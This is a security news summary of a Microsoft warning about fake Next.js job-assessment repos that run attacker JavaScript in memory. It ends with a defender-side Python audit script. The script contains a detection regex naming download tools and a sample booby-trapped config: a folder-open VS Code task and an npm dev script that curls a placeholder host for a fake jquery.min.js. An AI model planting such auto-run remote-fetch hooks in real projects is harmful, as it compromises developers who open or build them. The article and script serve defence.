Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware
"The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution. The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2)."
"The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like "Cryptan-Platform-MVP1" to trick developers looking for jobs into running as part of an assessment process. Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory."
"Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. Build‑time execution during application development, where manually running the development server via "npm run dev" is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js."
Microsoft Defender identified a developer-targeting campaign that uses malicious repositories disguised as legitimate Next.js projects and technical assessments. The attackers create fake repositories on platforms such as Bitbucket, with names chosen to attract job-seeking developers. The campaign employs three distinct execution paths: VS Code workspace automation that runs malicious code as soon as the project is opened and trusted, build-time execution triggered by npm commands that fetch payloads from Vercel domains, and execution at server startup that is accompanied by exfiltration of the environment. All three paths converge on executing attacker-controlled JavaScript in memory to establish command-and-control (C2) access. The job-themed lures let the activity blend into normal developer workflows and increase the likelihood of code execution.
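A pre-open audit for the first two execution paths described above, added here as a defender-side example (it is not Microsoft's or The Hacker News' tooling). It assumes VS Code workspace automation lives in `.vscode/tasks.json` as a task with `runOptions.runOn` set to `folderOpen`, that the npm-side trigger lives in `package.json` scripts, and that the `REMOTE_EXEC` pattern is a constructed heuristic rather than a signature for this campaign.

```python
import json
import re
from pathlib import Path

# npm runs lifecycle hooks implicitly; "dev"/"start" are typed without reading them first
AUTO_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "predev", "dev", "start"}
# Constructed heuristic: download tools, URLs, or inline node eval inside a script command
REMOTE_EXEC = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://|\bnode\s+-e\b", re.I)

def _load_jsonc(text):
    """Parse JSON, tolerating the full-line // comments VS Code allows in tasks.json."""
    stripped = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
    try:
        return json.loads(stripped)
    except ValueError:
        return None

def audit_configs(tasks_json, package_json):
    """Return findings for the two auto-execution paths; an empty list means nothing flagged."""
    findings = []
    tasks = _load_jsonc(tasks_json) if tasks_json else None
    if isinstance(tasks, dict):
        for task in tasks.get("tasks", []):
            # A folderOpen task fires once the developer trusts the workspace; flag it regardless of command
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append(f"tasks.json: {task.get('label')!r} runs on folder open: {task.get('command')!r}")
    pkg = _load_jsonc(package_json) if package_json else None
    if isinstance(pkg, dict):
        for name, cmd in (pkg.get("scripts") or {}).items():
            if name in AUTO_SCRIPTS and REMOTE_EXEC.search(str(cmd)):
                findings.append(f"package.json: script {name!r} fetches/executes remote code: {cmd!r}")
    return findings

def audit_repo(root):
    """File-system wrapper: audit a cloned checkout before opening it in an editor."""
    root = Path(root)
    read = lambda p: p.read_text(encoding="utf-8") if p.is_file() else None
    return audit_configs(read(root / ".vscode" / "tasks.json"), read(root / "package.json"))

if __name__ == "__main__":
    # Constructed sample of a booby-trapped assessment repo; the host is a placeholder, not an IoC
    SAMPLE_TASKS = '''{
      // fires as soon as the folder is opened and trusted
      "version": "2.0.0",
      "tasks": [{"label": "setup", "type": "shell", "command": "node scripts/setup.js",
                 "runOptions": {"runOn": "folderOpen"}}]
    }'''
    SAMPLE_PKG = '{"scripts": {"dev": "curl -s https://example.invalid/jquery.min.js -o public/jquery.min.js && next dev"}}'
    for finding in audit_configs(SAMPLE_TASKS, SAMPLE_PKG):
        print(finding)
```

Run `audit_repo(path)` on a freshly cloned assessment before opening it in VS Code or typing `npm run dev`; any finding warrants reading the referenced file by hand.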
Read at The Hacker News